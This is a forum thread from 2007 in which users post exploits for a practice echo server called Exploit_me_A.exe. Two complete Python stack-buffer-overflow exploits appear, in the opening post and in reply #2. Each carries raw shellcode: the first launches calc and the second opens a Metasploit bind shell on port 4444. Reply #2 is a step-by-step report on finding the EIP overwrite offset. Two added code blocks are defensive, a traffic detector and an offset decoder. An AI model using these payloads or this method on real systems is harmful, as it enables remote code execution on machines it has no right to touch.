[Original] exploit_me_A exploit
Posted on: 2007-12-29 19:49  17963

#!/usr/bin/env python
# Python 2 script: str is a byte string, so the "\x.." escapes are raw bytes

import socket

host = "127.0.0.1"
port = 7777
JMPESP = "\x12\x45\xFA\x7F"
# shellcode: launches the calculator
shellcode="\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
shellcode+="\x58\x6c\xa3\x83\xeb\xfc\xe2\xf4\x8d\xb0\x28\xa3\x71\x58\xe7\xe6"
shellcode+="\x4d\xd3\x10\xa6\x09\x59\x83\x28\x3e\x40\xe7\xfc\x51\x59\x87\xea"
shellcode+="\xfa\x6c\xe7\xa2\x9f\x69\xac\x3a\xdd\xdc\xac\xd7\x76\x99\xa6\xae"
shellcode+="\x70\x9a\x87\x57\x4a\x0c\x48\xa7\x04\xbd\xe7\xfc\x55\x59\x87\xc5"
shellcode+="\xfa\x54\x27\x28\x2e\x44\x6d\x48\xfa\x44\xe7\xa2\x9a\xd1\x30\x87"
shellcode+="\x75\x9b\x5d\x63\x15\xd3\x2c\x93\xf4\x98\x14\xaf\xfa\x18\x60\x28"
shellcode+="\x01\x44\xc1\x28\x19\x50\x87\xaa\xfa\xd8\xdc\xa3\x71\x58\xe7\xcb"
shellcode+="\x4d\x07\x5d\x55\x11\x0e\xe5\x5b\xf2\x98\x17\xf3\x19\x26\xb4\x41"
shellcode+="\x02\x30\xf4\x5d\xfb\x56\x3b\x5c\x96\x3b\x0d\xcf\x12\x58\x6c\xa3"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print shellcode
print "[*] Connecting to [%s:%d]" % (host, port)
s.connect((host, port))

# 200 bytes of padding reach the saved return address, JMPESP overwrites it,
# and a short NOP sled leads into the shellcode
buffer = "A" * 200 + JMPESP + "\x90" * 8 + shellcode

print "[*] Sending [%s]" % buffer
s.send(buffer)

print "[*] Closing socket"
s.close()
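From the defending side, the useful question is what the messages this script sends look like on the wire to the service on port 7777. The following is an added example, not code from the post or its author: it scores a single inbound message using only the facts the thread establishes (a 200-byte buffer before the return address, the fixed JMP ESP bytes, a 0x90 sled in front of the shellcode) plus generic indicators of a binary payload. The sample messages, the placeholder "shellcode" byte run, and all function names are constructed for this example.

```python
import re

# Values taken from the thread: the overflow starts at byte 200 (bytes 201-204 land on EIP),
# the exploit places a fixed JMP ESP address there and follows it with a NOP sled.
# Everything else below is constructed for this example.
BUFFER_SIZE = 200
JMP_ESP_ADDR = b"\x12\x45\xFA\x7F"   # the post's JMPESP bytes, little-endian 0x7FFA4512
NOP_SLED_MIN = 8                      # the shortest sled the post's exploits use
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def nonprintable_ratio(data: bytes) -> float:
    """Fraction of bytes that are neither printable ASCII nor tab/CR/LF."""
    if not data:
        return 0.0
    return sum(1 for b in data if b not in PRINTABLE) / len(data)


def analyse_message(data: bytes) -> dict:
    """Classify one message sent to the echo service.

    Indicators, from coarse to specific:
      oversized      - longer than the 200-byte stack buffer the post found
      padding_run    - 100+ copies of one byte (the A*200 / A*1000 style filler)
      nop_sled       - NOP_SLED_MIN or more consecutive 0x90 bytes
      ret_is_jmpesp  - the four bytes that would land on EIP are the known JMP ESP address
      binary_payload - a large share of non-printable bytes, as raw shellcode has
    """
    ind = {
        "length": len(data),
        "oversized": len(data) > BUFFER_SIZE,
        "padding_run": re.search(rb"(.)\1{99,}", data, re.DOTALL) is not None,
        "nop_sled": re.search(rb"\x90{%d,}" % NOP_SLED_MIN, data) is not None,
        "ret_is_jmpesp": data[BUFFER_SIZE:BUFFER_SIZE + 4] == JMP_ESP_ADDR,
        "binary_payload": nonprintable_ratio(data) > 0.3,
    }
    if ind["ret_is_jmpesp"] or (ind["oversized"] and (ind["nop_sled"] or ind["binary_payload"])):
        ind["verdict"] = "exploit_attempt"
    elif ind["oversized"]:
        ind["verdict"] = "overflow_probe"
    else:
        ind["verdict"] = "benign"
    return ind


# Constructed sample traffic (not captures): a normal echo request, the post's 1000-A crash
# trigger, and an exploit-shaped message whose "shellcode" is a harmless placeholder byte run.
PLACEHOLDER_SHELLCODE = bytes(range(0x80, 0xC0)) * 2
SAMPLES = {
    "hello": b"hello echo server\n",
    "probe": b"A" * 1000,
    "exploit_shaped": b"A" * 200 + JMP_ESP_ADDR + b"\x90" * 8 + PLACEHOLDER_SHELLCODE,
}


def triage(samples=SAMPLES) -> dict:
    """Return {name: verdict} for each sample message."""
    return {name: analyse_message(data)["verdict"] for name, data in samples.items()}


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        ind = analyse_message(data)
        flags = ", ".join(k for k in ("oversized", "padding_run", "nop_sled",
                                      "ret_is_jmpesp", "binary_payload") if ind[k])
        print("%-15s len=%-5d %-16s [%s]" % (name, ind["length"], ind["verdict"], flags))
```

The coarse indicators (length over the buffer size, a long run of one byte) catch the crash-hunting stage of the thread on their own; the JMP ESP bytes at offset 200 are a signature for this one target and this one address, so the sled and non-printable checks carry the detection when the address or padding changes.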

#2
Exploit_me_A.exe Analysis Report
Submitter's Pediy ID: hahar
Occupation (student, programmer, security expert, hacking enthusiast, other?): student

1. PE analysis
After getting the program, we know from its introduction that it is a server program. Run it directly, then use Process Explorer to check which port Exploit_me_A.exe is listening on, as shown in Figure 1:

The program listens on port 7777. Next, use a Python script to send a string of A's and see how the server reacts:
#!/usr/bin/env python
# Python 2 script

import socket

host = "127.0.0.1"
port = 7777

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
print "[*] Connecting to [%s:%d]" % (host, port)
s.connect((host, port))

# first probe: ten A's
buffer = "A" * 10
print "[*] Sending [%s]" % buffer
s.send(buffer)

print "[*] Closing socket"
s.close()

The server returned the data we sent, so we tentatively conclude it is an echo program: whatever you send, it sends back.
2. Vulnerability description
With 10 A's the program did not overflow. Gradually increase the number of A's; when it reaches 1000, the cdb debugger reports an exception (note: cdb is included in the Windows Debugging Tools package, and "cdb -iae" sets cdb as the debugger that handles exceptions).

This shows that the server program hits an exception while processing user input, causing an overflow. The debugger shows it executing 41414141, which is obviously the A's we sent. The next step is to locate the overflow point precisely. One can use bisection (testing with lengths of 500, 250, 125, ...) or the hundreds/tens/units positioning method; the second method is used here.
Modify the Python program:
buffer = ""
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 100

The result shows that the character "C" overwrote EIP, so the overflow length is between 200 and 300. Continue by locating the tens digit:
buffer = "a" * 200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 10

The debugger shows that character A overwrote EIP, so the overwrite length is between 200 and 210. Locate the units digit the same way:
buffer = "a" * 200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 1

The result shows that bytes 201 to 204 overwrote EIP. Now we can construct the exploit.
Buffer = A*200 + JMPESP + NOP*20 + Shellcode
As you can see I used 20 NOPs here; actually it only needs to be larger than the number subtracted when the function returns, and NOP instructions do not affect shellcode execution. JMPESP uses the JMP ESP address that is universal on Chinese-language platforms: JMPESP = "\x12\x45\xFA\x7F"
3. Shellcode function
I'm lazy, so I generated it directly from http://metasploit.com:55555/PAYLOADS?FILTER=win32
Choose windows bind shell, which produces a shellcode that listens on port 4444.

4. Stability and generality
Because the JMPESP address used in the program applies to all Chinese-language operating systems, and the shellcode also locates API addresses dynamically, it has good stability and generality.
5. Screenshot of the successful exploit run

You can see that port 4444 is listening.
6. Exploit
#!/usr/bin/env python
# Python 2 script: str is a byte string, so the "\x.." escapes are raw bytes

import socket

host = "127.0.0.1"
port = 7777
JMPESP = "\x12\x45\xFA\x7F"
# shellcode: bind shell listening on port 4444
shellcode="\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe"
shellcode+="\x6b\xb2\x91\x83\xeb\xfc\xe2\xf4\x42\x01\x59\xdc\x56\x92\x4d\x6e"
shellcode+="\x41\x0b\x39\xfd\x9a\x4f\x39\xd4\x82\xe0\xce\x94\xc6\x6a\x5d\x1a"
shellcode+="\xf1\x73\x39\xce\x9e\x6a\x59\xd8\x35\x5f\x39\x90\x50\x5a\x72\x08"
shellcode+="\x12\xef\x72\xe5\xb9\xaa\x78\x9c\xbf\xa9\x59\x65\x85\x3f\x96\xb9"
shellcode+="\xcb\x8e\x39\xce\x9a\x6a\x59\xf7\x35\x67\xf9\x1a\xe1\x77\xb3\x7a"
shellcode+="\xbd\x47\x39\x18\xd2\x4f\xae\xf0\x7d\x5a\x69\xf5\x35\x28\x82\x1a"
shellcode+="\xfe\x67\x39\xe1\xa2\xc6\x39\xd1\xb6\x35\xda\x1f\xf0\x65\x5e\xc1"
shellcode+="\x41\xbd\xd4\xc2\xd8\x03\x81\xa3\xd6\x1c\xc1\xa3\xe1\x3f\x4d\x41"
shellcode+="\xd6\xa0\x5f\x6d\x85\x3b\x4d\x47\xe1\xe2\x57\xf7\x3f\x86\xba\x93"
shellcode+="\xeb\x01\xb0\x6e\x6e\x03\x6b\x98\x4b\xc6\xe5\x6e\x68\x38\xe1\xc2"
shellcode+="\xed\x38\xf1\xc2\xfd\x38\x4d\x41\xd8\x03\xa3\xcd\xd8\x38\x3b\x70"
shellcode+="\x2b\x03\x16\x8b\xce\xac\xe5\x6e\x68\x01\xa2\xc0\xeb\x94\x62\xf9"
shellcode+="\x1a\xc6\x9c\x78\xe9\x94\x64\xc2\xeb\x94\x62\xf9\x5b\x22\x34\xd8"
shellcode+="\xe9\x94\x64\xc1\xea\x3f\xe7\x6e\x6e\xf8\xda\x76\xc7\xad\xcb\xc6"
shellcode+="\x41\xbd\xe7\x6e\x6e\x0d\xd8\xf5\xd8\x03\xd1\xfc\x37\x8e\xd8\xc1"
shellcode+="\xe7\x42\x7e\x18\x59\x01\xf6\x18\x5c\x5a\x72\x62\x14\x95\xf0\xbc"
shellcode+="\x40\x29\x9e\x02\x33\x11\x8a\x3a\x15\xc0\xda\xe3\x40\xd8\xa4\x6e"
shellcode+="\xcb\x2f\x4d\x47\xe5\x3c\xe0\xc0\xef\x3a\xd8\x90\xef\x3a\xe7\xc0"
shellcode+="\x41\xbb\xda\x3c\x67\x6e\x7c\xc2\x41\xbd\xd8\x6e\x41\x5c\x4d\x41"
shellcode+="\x35\x3c\x4e\x12\x7a\x0f\x4d\x47\xec\x94\x62\xf9\x4e\xe1\xb6\xce"
shellcode+="\xed\x94\x64\x6e\x6e\x6b\xb2\x91"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
print "[*] Connecting to [%s:%d]" % (host, port)
s.connect((host, port))
# units-digit probe from section 2, left commented out
#buffer = "a"*200
#li = ["A","B","C","D","E","F","G","H","I","J"]
#for ch in li:
#    buffer += ch *1
#print buffer
# 200 bytes of padding, JMPESP over the return address, 20-byte NOP sled, shellcode
buffer = "A" * 200 + JMPESP + "\x90" * 20 + shellcode
#buffer = "A" * 1000
print "[*] Sending [%s]" % buffer
s.send(buffer)

print "[*] Closing socket"
s.close()
    2007-12-29 20:48
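For anyone triaging such a crash (is the faulting EIP under the sender's control, and at which offset in the input?), the three probing rounds described in section 2 of the report above can be decoded mechanically. The following is an added example, not the author's code: it rebuilds the report's labelled payloads, converts the register value cdb prints (for example eip=43434343) into the four bytes as they sat in memory, and narrows the offset round by round. Instead of a debugger it uses a simulated handler that simply returns the bytes landing on the return address; simulated_target, observe_eip and every other name here are this example's own. The decoder is slightly more general than the report's reading of it, in that it intersects the constraint from each of the four EIP bytes, so a label boundary inside EIP pins the offset in fewer rounds.

```python
LABELS = b"ABCDEFGHIJ"


def labelled_payload(prefix_len: int, stride: int, filler: bytes = b"a") -> bytes:
    """The report's probe: `prefix_len` filler bytes, then ten blocks A..J of `stride`
    bytes each. (0, 100) is the hundreds round, (200, 10) the tens round, (200, 1) units."""
    return filler * prefix_len + b"".join(bytes([c]) * stride for c in LABELS)


def eip_bytes(eip_value: int) -> bytes:
    """Turn the register value the debugger prints (e.g. eip=43434343) into the four
    bytes as they sat in memory, lowest address first (x86 is little-endian)."""
    return eip_value.to_bytes(4, "little")


def offset_from_eip(eip: bytes, prefix_len: int, stride: int):
    """Map the four bytes that overwrote EIP back to where the overwrite starts in the
    sent buffer. Returns (lo, hi): the first overwriting byte is at an offset in [lo, hi).
    EIP byte i sits at offset start + i, so a label in block [block_lo, block_hi) confines
    start to [block_lo - i, block_hi - i); the intersection of the four is the answer."""
    lo, hi = 0, None
    for i, b in enumerate(eip):
        idx = LABELS.find(bytes([b]))
        if idx < 0:
            raise ValueError("EIP byte %#04x is not a label byte: not a clean overwrite" % b)
        block_lo = prefix_len + idx * stride
        block_hi = block_lo + stride
        lo = max(lo, block_lo - i)
        hi = block_hi - i if hi is None else min(hi, block_hi - i)
    if hi is None or lo >= hi:
        raise ValueError("EIP bytes are mutually inconsistent")
    return lo, hi


def narrow_offset(observe_eip, strides=(100, 10, 1)):
    """Run the hundreds/tens/units rounds. `observe_eip(payload)` must return the four
    EIP bytes after the crash. Each round starts its labels at the lower bound found so
    far, bounds are intersected across rounds, and we stop as soon as one offset remains."""
    best_lo, best_hi = 0, None
    prefix = 0
    for stride in strides:
        payload = labelled_payload(prefix, stride)
        lo, hi = offset_from_eip(observe_eip(payload), prefix, stride)
        best_lo = max(best_lo, lo)
        best_hi = hi if best_hi is None else min(best_hi, hi)
        if best_hi - best_lo == 1:
            break
        prefix = best_lo
    return best_lo, best_hi


def simulated_target(ret_offset: int):
    """Stand-in for the debugger (constructed for this example): a handler that copies its
    input over a stack frame whose saved return address sits `ret_offset` bytes in, and
    reports the four bytes that land on EIP."""
    def observe(payload: bytes) -> bytes:
        if len(payload) < ret_offset + 4:
            raise RuntimeError("payload too short to reach the return address: no crash")
        return payload[ret_offset:ret_offset + 4]
    return observe


if __name__ == "__main__":
    # The report's three observations: 'C' in round 1, 'A' in round 2, 'ABCD' in round 3.
    print(offset_from_eip(eip_bytes(0x43434343), 0, 100))   # (200, 297)
    print(offset_from_eip(eip_bytes(0x41414141), 200, 10))  # (200, 207)
    print(offset_from_eip(eip_bytes(0x44434241), 200, 1))   # (200, 201)
    # The whole procedure against a simulated frame whose return address is 200 bytes in.
    print(narrow_offset(simulated_target(200)))             # (200, 201)
```

The offsets are zero-based, so (200, 201) is exactly the report's "bytes 201 to 204 overwrote EIP". A byte in EIP that is not one of the labels (0x90, 0x00, an address) means the overwrite is not a straight copy of the input, and the function refuses to guess rather than returning a misleading range.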
#3
There is no attachment upload function, so the images and the Word document cannot be submitted.
    2007-12-29 20:54
#4
Click "Reply to thread", then click "Manage attachments", and you can upload attachments.

For inserting images, see this thread:
http://bbs.pediy.com/showpost.php?postid=292659
    2007-12-29 21:00
#5
Thanks, uploaded!
Attachments:
    2007-12-29 21:12
#6
    support it.
    2010-2-3 19:33